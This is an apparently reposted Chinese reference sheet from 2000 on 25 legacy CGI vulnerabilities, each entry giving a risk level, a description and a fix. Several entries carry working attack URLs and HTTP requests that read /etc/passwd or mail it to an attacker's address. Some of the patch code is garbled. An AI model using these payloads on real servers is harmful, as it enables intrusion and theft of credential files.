Home > php教程 > php手册 > body text

CGI安全漏洞资料速查 v1.0(转一)

WBOY
Release: 2016-06-21 09:12:30
Original
1061 people have browsed it

cgi|安全|安全漏洞

◆ CGI安全漏洞资料速查 v1.0

日期:2000-8-15

    #############################################################################
本文取自一位朋友.这本来不算是什么珍贵的东西,如果你平时注意收集的话,相信很多人都会
有比这份更全面、更好的资料.但由于某些原因.这些资料一直都不肯被公开.但我是一个崇尚完
全自由、完全开放、完全共享的little guys.所以我把这份资料公开了.希望那位朋友不要怪罪 :) 
# 如有任何安全组织或个人愿意无尝对此文进行长期的、不间断地维护、更新或更改. 请自行
  随便,不必与我商讨.但要求是成果必须完全地向internet公开. 任何行为的私藏都是不受欢
  迎的.
# 本文欢迎转摘.但请保持这些声明。
# 如有任何问题或建议,请mailto: iwillsurewin@163.net
# iwillsurewin 2000.7.28
############################################################################

         
1
类型: 攻击型
名字: phf
风险等级: 中
描述: 在NCSA 或者 Apache (1.1.1版本以内)非商业版本的Web Server中有一段程序util.c,允许黑客以root身份执行任何一个指令:
http://www.xxx.com/cgi-bin/phf?Qname=root%0Asome%20command%20here
建议: 
解决方法: 把Apache web server升级到1.1.1以上,或者将NCSA web server升级到最新版本

_________________________________________________________________

2
类型: 攻击型
名字: wguset.exe
风险等级: 中
描述: 如果您使用NT做为您的WebServer的操作系统,而且wguest.exe存在于您的Web可执行目录中的话,入侵者将能利用它阅读到您的硬盘上所有USR_用户能阅读的文件
建议: 将wguset.exe从你的Web目录移走或删除
解决方法: 将wguset.exe从你的Web目录移走或删除

___________________________________________________________________


3
类型: 攻击型
名字: rguset.exe
风险等级: 中
描述: 如果您使用NT做为您的WebServer的操作系统,而且rguest.exe存在于您的Web可执行目录中的话,入侵者将能利用它阅读到您的硬盘上所有USR_用户能阅读的文件
建议: 将rguset.exe从你的Web目录移走或删除
解决方法: 将rguset.exe从你的Web目录移走或删除


_______________________________________________________________________

4
类型: 攻击型
名字: perl.exe
风险等级: 低
描述: 在cgi-bin执行目录下存在perl.exe,这属于严重的配置错误。黑客可以在perl.exe后面加一串指令,利用浏览器在server上执行任何脚本程序
建议: perl.exe是放在任何带执行权限的web目录下都是不安全的
解决方法: 在web目录下移除perl.exe这个程序.


____________________________________________________________________


5
类型: 攻击型
名字: shtml.exe
风险等级: 低
描述: 如果您使用Front Page作为您的WebServer,那么入侵者能够利用IUSR_用户和shtml.exe入侵您的机器,做您不希望的事
建议: 将shtml.exe从你的Web目录移走或删除
解决方法: 将shtml.exe从你的Web目录移走或删除


___________________________________________________________________


6
类型: 攻击型
名字: wwwboard.pl
风险等级: 低
描述: wwwboard.pl程序容易引起攻击者对服务器进行D.O.S攻击
建议: 如无必要可以删除该文件
解决方法: 对get_variables的子程序中的下面这段:
if ($FORM{'followup'}) { $followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}"; }
替换为:
if ($FORM{'followup'}) {
$followup = "1";
@followup_num = split(/,/,$FORM{'followup'});
$num_followups = @followups = @followup_num;
$last_message = pop(@followups);
$origdate = "$FORM{'origdate'}";
$origname = "$FORM{'origname'}";
$origsubject = "$FORM{'origsubject'}";
# WWWBoard Bomb Patch
# Written By: Samuel Sparling sparling@slip.net)
$fn=0;
while($fn {
$cur_fup = @followups $fn];
$dfn=0;
foreach $fm(@followups)
{
if(@followups[$dfn] == @followups[$fn] && $dfn != $fn)
{
&error(board_bomb);
}
$dfn++;
}
$fn++;
}
# End WWWBoard Bomb Patch
}

相关连接: http://hgfr

_________________________________________________________________________

7
类型: 攻击型
名字: uploader.exe
风险等级: 中
描述: 如果您使用NT作为您的WebServer的操作系统,入侵者能够利用uploader.exe上传任何文件
建议: 将uploader.exe从你的Web目录移走或删除
解决方法: 将uploader.exe从你的Web目录移走或删除

________________________________________________________________

8
类型: 攻击型
名字: bdir.htr
风险等级: 高
描述: 如果您使用NT做为您的WebServer的操作系统,而且bdir.htr存在于您的Web可执行目录中的话,入侵者将能利用它在您的服务器上无止境的创建ODBC数据库,并生成一些可执行的文件。
建议: 将bdir.htr从你的Web目录移走或删除
解决方法: 将bdir.htr从你的Web目录移走或删除

__________________________________________________________________

9
类型: 攻击型
名字: Count.cgi
风险等级: 高
描述: 在/cgi-bin目录下的Count.cgi程序(wwwcount2.3版本)有一个溢出错误,允许入侵者无须登录而远程执行任何指令.
建议: 如无必要可以删除该文件
解决方法: 将wwwcount升级到2.4或者以上

_________________________________________________________________

10
类型: 攻击型
名字: test-cgi
风险等级: 高
描述: test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息

建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限
解决方法: 删除test-cgi文件

__________________________________________________________________

11
类型: 攻击型
名字: nph-test-cgi
风险等级: 高
描述: nph-test-cgi这个文件可以被入侵者用来浏览服务器上的重要信息

建议: 建议审核cgi-bin目录下的执行程序,严格控制访问权限
解决方法: 删除nph-test-cgi文件

__________________________________________________________________

12
类型: 攻击型
名字: php.cgi
风险等级: 低
描述: php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任何系统文件可以被入侵者读取的漏洞
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除php.cgi程序是最好的办法

_________________________________________________________________

13
类型: 攻击型
名字: handler
风险等级: 低
描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在缓存溢出错误,允许入侵者在server上远程执行一段程序:
telnet target.machine.com 80
GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
HTTP/1.0
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除handler文件

________________________________________________________________


14
类型: 攻击型
名字: webgais
风险等级: 高
描述: /cgi-bin,目录下的webgais是GAIS搜索工具的一个接口,它有一个毛病使入侵者可以绕过程序的安全机制,执行系统命令:
POST /cgi-bin/webgais HTTP/1.0
Content-length: 85 (replace this with the actual length of the "exploit" line)
telnet target.machine.com 80

query=';mail+you\@your.host/passwd;echo'&output=subject&domain=paragraph
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除webgais文件

________________________________________________________________

15
类型: 攻击型
名字: websendmail
风险等级: 高
描述: /cgin-bin目录下的websendmail程序允许入侵者执行一个系统指令:

telnet target.machine.com 80
POST /cgi-bin/websendmail HTTP/1.0
Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
receiver=;mail+your_address\@somewhere.org/passwd;&sender=a&rtnaddr=a&subject=a
&content=a
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 高级用户:编辑websendmail脚本,过滤特殊字符
一般用户:删除websendmail文件

____________________________________________________________________

16
类型: 攻击型
名字: webdist.cgi
风险等级: 高
描述: 对于Irix6.2和6.3平台,/cgi-bin目录下的webdist.cgi有一个弱点允许入侵者无须登录而在系统上执行任何指令:
http://host/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd

建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/var/www/cgi-bin/webdist.cgi目录下的webdist.cgi

__________________________________________________________________

17
类型: 攻击型
名字: faxsurvey
风险等级: 高
描述: 在Linux S.u.S.E上/cgi-bin目录下的faxsurvey程序允许入侵者无须登录就能在服务器执行指令:
http://joepc.linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin/faxsurvey文件


_______________________________________________________________________


18
类型: 攻击型
名字: htmlscript
风险等级: 中
描述: 安装了htmlscript2.99x或者更早版本的服务器,存在一个毛病使入侵者可以查看服务器上的任何文件:
http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin/htmlscript脚本文件,或者将htmlscript升级到3。0以上


__________________________________________________________________________

19
类型: 攻击型
名字: pfdisplay
风险等级: 中
描述: 在Irix6.4或者更早版本的web服务器上,/cgi-bin/pfdisplay程序允许入侵者非法查看服务器上的文件
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin/pfdisplay文件,或者打补丁
补丁可以去sgigate.sgi.com (204.94.209.1) 或者ftp.sgi.com下载:
Filename: README.patch.3018
Algorithm #1 (sum -r): 37955 11 README.patch.3018
Algorithm #2 (sum): 15455 11 README.patch.3018
MD5 checksum: 1169EB51D75E0794C64C2C1FD6211B69

Filename: patchSG0003018
Algorithm #1 (sum -r): 01679 2 patchSG0003018
Algorithm #2 (sum): 12876 2 patchSG0003018
MD5 checksum: BD16A53A0AE693D6E9E276EE066BDBC8

Filename: patchSG0003018.idb
Algorithm #1 (sum -r): 01339 2 patchSG0003018.idb
Algorithm #2 (sum): 251 2 patchSG0003018.idb
MD5 checksum: 1CB16E6A8C50BF17CD02A29C2E4D35EB

Filename: patchSG0003018.performer_tools_man
Algorithm #1 (sum -r): 10201 8 patchSG0003018.performer_tools_man
Algorithm #2 (sum): 3144 8 patchSG0003018.performer_tools_man
MD5 checksum: B6B3D90FAB9B5A342397C3E5AF5A8D29

Filename: patchSG0003018.performer_tools_sw
Algorithm #1 (sum -r): 48474 18 patchSG0003018.performer_tools_sw
Algorithm #2 (sum): 28176 18 patchSG0003018.performer_tools_sw
MD5 checksum: DF4E8ED8326A6A0B39F7B4D67E5FD71F
相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


_____________________________________________________________________


20
类型: 攻击型
名字: www-sql
风险等级: 中
描述: www-sql存在于/cgi-bin/目录下,这将导致入侵可以越权访问被保护的文件
建议: 最好删除www-sql文件
解决方法: #if PHPFASTCGI
while(FCGI_Accept() >= 0)
{
#endif
s = getenv("REDIRECT_STATUS");
if(!s) {
puts("Content-type: text/plain\r\n\r\nPHP/FI detected an internal error. Please inform sa@hogia.net of what you just did.\n");
exit(1);
}
s = getenv("PATH_TRANSLATED");
相关连接:

_________________________________________________________________________________


21
类型: 攻击型
名字: view-source
风险等级: 高
描述: 在cgi-bin目录下的view-source程序没有对输入进行安全检查,使入侵者可以查看服务器上的任何文件
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin目录下的viewsource程序
相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64

______________________________________________________________________

22
类型: 攻击型
名字: campas
风险等级: 高
描述: 在cgi-bin目录下的campas程序有一个毛病可以使入侵者随意查看server上的重要文件:
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin目录下的campas程序
相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


___________________________________________________________________________


23
类型: 攻击型
名字: aglimpse
风险等级: 高
描述: 在cgi-bin目录下的aglimpse程序有一个毛病可以使入侵者无须登录而随意执行任何指令 
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin目录下的aglimpse程序
相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


______________________________________________________________________________

24
类型: 攻击型
名字: AT-admin.cgi
风险等级: 中
描述: 在Excite for Web Servers 1.1上的/cgi-bin/AT-admin.cgi程序,允许普通用户完全控制整个系统
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin目录下的AT-admin.cgi程序
相关连接: http://www.securityfocus.com/vdb/bottom.html?section=solution&vid=64


____________________________________________________________________________________

25
类型: 攻击型
名字: finger
风险等级: 中
描述: 这个位于/cgi-bin下的finger程序,可以查看其它服务器的信息,但是如果将参数改成本机,本机上的帐号信息将暴露无遗:
/cgi-bin/finger?@localhost
建议: 建议审核cgi-bin目录,避免有不必要的程序存在
解决方法: 删除/cgi-bin目录下的finger程序
相关连接:


________________________________________________________________________



Related labels:
source:php.cn
Statement of this Website
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Popular Recommendations
Popular Tutorials
More>
Latest Downloads
More>
Web Effects
Website Source Code
Website Materials
Front End Template